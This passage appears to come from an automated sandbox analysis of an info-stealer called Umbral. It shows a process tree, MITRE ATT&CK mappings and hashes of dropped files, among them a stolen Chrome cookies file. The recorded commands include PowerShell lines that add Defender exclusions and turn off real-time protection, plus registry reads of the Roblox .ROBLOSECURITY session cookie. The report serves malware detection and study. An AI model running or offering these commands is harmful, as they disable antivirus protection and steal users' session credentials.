        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        25⤵
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        25⤵
        
        PID:744
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        24⤵
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        24⤵
        
        PID:4260
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        23⤵
        
        PID:4836
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        23⤵
        
        PID:2180
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        22⤵
        Executes dropped EXE
        
        PID:2032
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        22⤵
        Executes dropped EXE
        
        PID:4580
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        21⤵
        Executes dropped EXE
        
        PID:4064
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        21⤵
        Executes dropped EXE
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        20⤵
        Executes dropped EXE
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        20⤵
        Executes dropped EXE
        
        PID:3812
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        19⤵
        Executes dropped EXE
        
        PID:2844
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        19⤵
        Executes dropped EXE
        
        PID:1116
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        18⤵
        Executes dropped EXE
        
        PID:1020
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        18⤵
        Executes dropped EXE
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        17⤵
        Executes dropped EXE
        
        PID:2568
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        17⤵
        Executes dropped EXE
        
        PID:2728
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        16⤵
        Executes dropped EXE
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        16⤵
        Executes dropped EXE
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        15⤵
        Executes dropped EXE
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        15⤵
        Executes dropped EXE
        
        PID:4036
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        14⤵
        Executes dropped EXE
        
        PID:4952
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        14⤵
        Executes dropped EXE
        
        PID:3924
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        13⤵
        Executes dropped EXE
        
        PID:3884
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        13⤵
        Executes dropped EXE
        
        PID:4284
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        12⤵
        Executes dropped EXE
        
        PID:4048
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        12⤵
        Executes dropped EXE
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        11⤵
        Executes dropped EXE
        
        PID:4612
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        11⤵
        Executes dropped EXE
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        10⤵
        Executes dropped EXE
        
        PID:4448
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        10⤵
        Executes dropped EXE
        
        PID:2388
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        9⤵
        Executes dropped EXE
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        9⤵
        Executes dropped EXE
        
        PID:3152
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        8⤵
        Executes dropped EXE
        
        PID:1000
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        8⤵
        Executes dropped EXE
        
        PID:4816
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        7⤵
        Executes dropped EXE
        
        PID:3260
        
        C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        7⤵
        Executes dropped EXE
        
        PID:732
      - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        6⤵
        Executes dropped EXE
        
        PID:2336
      - C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        6⤵
        Executes dropped EXE
        
        PID:3504
    - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        5⤵
        Executes dropped EXE
        
        PID:1188
    - - C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
        5⤵
        Executes dropped EXE
        
        PID:548
  - - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      4⤵
      Executes dropped EXE
      PID:2868
  - - C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
      "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
      4⤵
      Executes dropped EXE
      PID:1308
- - C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Executes dropped EXE
    PID:4972
- - C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
    "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
    3⤵
    - Executes dropped EXE
    PID:4836
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4724
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2568
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:3408
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2600
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4628
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1152
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:548
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:3380
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:4556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    PID:3148
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2948
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    3⤵
    PID:3212
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1640
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:552
- C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe
  "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"
  2⤵
  - Executes dropped EXE
  PID:4476

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:4836

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:4436

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:3176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

Filesize
4B

MD5
f49655f856acb8884cc0ace29216f511

SHA1
cb0f1f87ec0455ec349aaa950c600475ac7b7b6b

SHA256
7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba

SHA512
599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\3b6c3e70-410c-447a-a7c4-1059366f15dc.tmp

Filesize
92KB

MD5
81fbcfa5f77f45aa47a38ede9f49e400

SHA1
d69c737bae598159595f566067826bae13cbde30

SHA256
3139ccadeb2a7b8fbc60d11db546f3536a0f676ebd4b44bbc96f101cdb65bb35

SHA512
eb6d5f3d08621e5b8a01740011f50a59e52290171483a33585ef1b7e415f116dc791a263c284647e8b999f2047b66aff3a620db30bedbf49f5c1449ceb3994fa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
211KB

MD5
151fb811968eaf8efb840908b89dc9d4

SHA1
7ec811009fd9b0e6d92d12d78b002275f2f1bee1

SHA256
043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed

SHA512
83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
192B

MD5
69d0572ff76af68a058613bf9fd34278

SHA1
e06b0a7e3037d8435169bfc323ea3d27f4920f87

SHA256
7c686246335405d57a33544f377ff2f8f6d3ce875157d40eae48ec3628cf3396

SHA512
5e057c1b87759b57b58134db451e2cfa3339faff53c2b4660a57119c5fc92b5b5475d29dd8ed87b6dc01f0db052624a5c287beca9c76c33d9b9344da58dee4e1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\5c50b82c-35db-4541-b5e9-168ff86ec56c.tmp

Filesize
356B

MD5
3c8c081986f4c691bd29f798723eced9

SHA1
c899be5330fe11ae33125e25e9e08d14b6e17639

SHA256
34a612c0ed35813ebe157987ef2292f1c7492751040f92a5006a03805c6b1205

SHA512
3fce45fa4ef8b9ec170f7c4978b056758188e89ec7fc9ea3ea225c20da8e29f0f37e6542804367f9ea5d1c4475f7e6060e6a659f68e47a9df370428f066de6be

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
db3d21e263c7c2941bc8ea8e6c1dc802

SHA1
13ca372bdbee85161e80ca783d9265d06d8bdf74

SHA256
9dc6a56c4f0bf50afe320ed3b83342c078b23b7b7fe9c71b51d473d7dd8fcd00

SHA512
ad01422794e879fdf03af42d8606570de1c7e3087c65e2efbcc14f2a44f21b60994335413fcef559ad030fa118135e4b4adee7254591df6c3cebba2bcb834683

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
eea48b66ad1b27cca9001d58ac89c8a7

SHA1
ff4770e4a401296380c4de2434c69c95f27ffb10

SHA256
3091425719abbdf96e233e14174d326ff42338993357e506416f0345ef388ae9

SHA512
a17935a56ce12323bf249574608548aa895063b1dd098b6d4ea1bc158f4930dd7c256ee9a1aef45c420e84f3aab1bcffa909f8b4d4a6048237196186e489e244

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
504a3af25b166014842125b01a7536ba

SHA1
86d8cdb843c19c53336ac84ae9952d719bf51971

SHA256
fbdf35f265e7cc49034d763215767c9b5233b364b4ee34672917d18e0c79b627

SHA512
cbf2e2fddfd67cee05c5eb14e43159fa5a9ef140639b53f1afbb546b9ee6041343e41ebd4b6d1c5cb16cb1a9d38ecbcb15a2efda1cb42fc779db9249ee3afacb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
92KB

MD5
ef93e56bd28426e1dc73b77167de9aec

SHA1
69718c930a4cb8b3cc34d58a3b113f9dd29695a4

SHA256
16a23055c979ab4f294882d895e6f37e96b060ff9f4675bab7275f7e74f13f0f

SHA512
4aeaad4b1bdefcf1724e50ba7db6edd63f84aa4dea4486f9585abc5ea8fafcd215303c4d0f580188771005139c04fc52f165f8c19808cbd88cc9d648205c1e78

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Umbral.exe.log

Filesize
1KB

MD5
4c8fa14eeeeda6fe76a08d14e08bf756

SHA1
30003b6798090ec74eb477bbed88e086f8552976

SHA256
7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

SHA512
116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Windows Defender.exe.log

Filesize
407B

MD5
988568d765624faf16f40428a4ce9391

SHA1
315546287ffb7c42338ee607f70eab727842b7e6

SHA256
b9c3d4f866a40d1d2fa165d19adb98c90166b2310aa3dd6c4750e6b3fca0c4c4

SHA512
82d6163e05ac0901900a4eebbb7c5a524817a410b08fc3d16f27f010ffec2c150a55d37ae88c8e5762a3c09cbd78f36bf7ddfcbc32e72a6efe4163f54ee38a49

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\2giVhpXDchUkRdm

Filesize
20KB

MD5
49693267e0adbcd119f9f5e02adf3a80

SHA1
3ba3d7f89b8ad195ca82c92737e960e1f2b349df

SHA256
d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f

SHA512
b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

Download Submit
C:\Users\Admin\AppData\Local\Temp\FATALITY.exe

Filesize
2.5MB

MD5
4320dae0d20c88ceb6f28b623a916dd2

SHA1
c1218c51804a602115462ea8259578fdbb280468

SHA256
441d4439cd72a239077d97895571804711356f1e1ded396c229635adf3c80ea4

SHA512
ee32e90d021835d608d43d3ee6d2d107fcfb15fa174c179ed4ae7dd47ec0dd45baadd1c73158c73d5e4fd7b89f5925ae505a6df66bb81e9d5693216316622fcf

Download Submit
C:\Users\Admin\AppData\Local\Temp\KIMfFrCAfuvlRzO

Filesize
48KB

MD5
349e6eb110e34a08924d92f6b334801d

SHA1
bdfb289daff51890cc71697b6322aa4b35ec9169

SHA256
c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\Nf9aAEbgXl8UYKU

Filesize
20KB

MD5
f30da390ffba678ff05e974e99bd23c8

SHA1
94ddf58cdd56dbaac02848c0c53503647bbfc5fc

SHA256
34068144795b01a22c173f5ea72ddfba6cc9b2c982d7a37cc34f5bfe148e7adc

SHA512
376ac9c7dcea1e50407c0bd9cb7eda0c602e66bfd82b1286d29e234613d9caf896e89a74f2c635d82418af5af0c1d47b60fdce0fca81e19a8f5b309ad7043151

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
227KB

MD5
e7452f59f2853220a6db8b98e26a81d1

SHA1
730e6e1f5a6ee671b4be097843b08c242ef4e8fb

SHA256
a9f45987c45143e6c198ebb530c0df131cf1ce8d6b40f07128d22ed30a698f21

SHA512
22ac9f0951e0a7f32012b20335b464eb0b41609f5fbf8bc7ecacfbc3dcad73bfdaeac5695632b9f8005edd2066b2b79a01a743ce04f5847c76e4faff7b1291b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe

Filesize
490KB

MD5
fa3f84d3150dab7b7d8e35efbb8d02db

SHA1
5b690c0be18426633a1954844f49cee2b1e09cb7

SHA256
a42d5a457ee0d90dee5cb5ba969687a83ba5626abf040a2f3ed496f83456c162

SHA512
a4dd554461e167c6a272f8ca90bcde729c319a115419b2a8874af34241116afadf9e6a4dec7db5e145f7e5a1d98827f0a50861c862abb89de81c3f4703247f1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ynfgid3w.zha.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fG0d46BYC8bNiBc\Browsers\Cookies\Chrome Cookies.txt

Filesize
348B

MD5
576a9a1c188c1b9b53a0d9d5d2693868

SHA1
4a09ba0931a399a10f4fdbd1a03b29180224593f

SHA256
b80895cea6e499281dc2cd0b6bdc3a19176ea3b7dacbdbe99946761cab2a07b7

SHA512
13946b8e1e61778979d8ce424a69e17a375a24768d59c4fa961e7e88a0f61539d8dd6911d09309514c990563bb1225ce749f07cc3879c8df90562f862289ff10

Download Submit
C:\Users\Admin\AppData\Local\Temp\gzX5TqNBeoiGRJa

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\lUO6ZZFir8RQVUR\Display\Display.png

Filesize
291KB

MD5
cf1bedef12ee1e8aa6274cd000336fe6

SHA1
5bd491e5a873a371309090d9eb8c50174d84757f

SHA256
0e4d0783b3f676cb06b1de9464ee24f2354f750c1ac7046ef7bbf731f1ce501f

SHA512
a00e6b28d3ba76ee909c9d945ad0b9c92aeaa482b0786f3bbd0926e48ebf4398f6bc00614d8be379346a51a8178cd59dd33c81834ed74e97857a17412245418c

Download Submit
C:\Users\Admin\AppData\Local\Temp\s5DhTwGkTEYSkRH

Filesize
20KB

MD5
a603e09d617fea7517059b4924b1df93

SHA1
31d66e1496e0229c6a312f8be05da3f813b3fa9e

SHA256
ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

SHA512
eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
4028457913f9d08b06137643fe3e01bc

SHA1
a5cb3f12beaea8194a2d3d83a62bdb8d558f5f14

SHA256
289d433902418aaf62e7b96b215ece04fcbcef2457daf90f46837a4d5090da58

SHA512
c8e1eef90618341bbde885fd126ece2b1911ca99d20d82f62985869ba457553b4c2bf1e841fd06dacbf27275b3b0940e5a794e1b1db0fd56440a96592362c28b

Download Submit
memory/1020-3232-0x00000146FDB50000-0x00000146FDB51000-memory.dmp

Filesize
4KB

Download
memory/1020-3235-0x00000146FDB50000-0x00000146FDB51000-memory.dmp

Filesize
4KB

Download
memory/1020-3236-0x00000146FDB50000-0x00000146FDB51000-memory.dmp

Filesize
4KB

Download
memory/1020-3237-0x00000146FDB50000-0x00000146FDB51000-memory.dmp

Filesize
4KB

Download
memory/1020-3239-0x00000146FDB50000-0x00000146FDB51000-memory.dmp

Filesize
4KB

Download
memory/1020-3238-0x00000146FDB50000-0x00000146FDB51000-memory.dmp

Filesize
4KB

Download
memory/1020-3231-0x00000146FDB50000-0x00000146FDB51000-memory.dmp

Filesize
4KB

Download
memory/1020-3233-0x00000146FDB50000-0x00000146FDB51000-memory.dmp

Filesize
4KB

Download
memory/1020-3240-0x00000146FDB50000-0x00000146FDB51000-memory.dmp

Filesize
4KB

Download
memory/3176-1277-0x00000226561C0000-0x00000226561C1000-memory.dmp

Filesize
4KB

Download
memory/3176-1276-0x00000226561C0000-0x00000226561C1000-memory.dmp

Filesize
4KB

Download
memory/3176-1278-0x00000226561C0000-0x00000226561C1000-memory.dmp

Filesize
4KB

Download
memory/3176-1280-0x00000226561C0000-0x00000226561C1000-memory.dmp

Filesize
4KB

Download
memory/3176-1281-0x00000226561C0000-0x00000226561C1000-memory.dmp

Filesize
4KB

Download
memory/3176-1282-0x00000226561C0000-0x00000226561C1000-memory.dmp

Filesize
4KB

Download
memory/3176-1285-0x00000226561C0000-0x00000226561C1000-memory.dmp

Filesize
4KB

Download
memory/3176-1284-0x00000226561C0000-0x00000226561C1000-memory.dmp

Filesize
4KB

Download
memory/3176-1283-0x00000226561C0000-0x00000226561C1000-memory.dmp

Filesize
4KB

Download
memory/4436-769-0x000001B284130000-0x000001B284131000-memory.dmp

Filesize
4KB

Download
memory/4436-768-0x000001B284130000-0x000001B284131000-memory.dmp

Filesize
4KB

Download
memory/4436-765-0x000001B284130000-0x000001B284131000-memory.dmp

Filesize
4KB

Download
memory/4436-766-0x000001B284130000-0x000001B284131000-memory.dmp

Filesize
4KB

Download
memory/4436-767-0x000001B284130000-0x000001B284131000-memory.dmp

Filesize
4KB

Download
memory/4436-770-0x000001B284130000-0x000001B284131000-memory.dmp

Filesize
4KB

Download
memory/4436-759-0x000001B284130000-0x000001B284131000-memory.dmp

Filesize
4KB

Download
memory/4436-760-0x000001B284130000-0x000001B284131000-memory.dmp

Filesize
4KB

Download
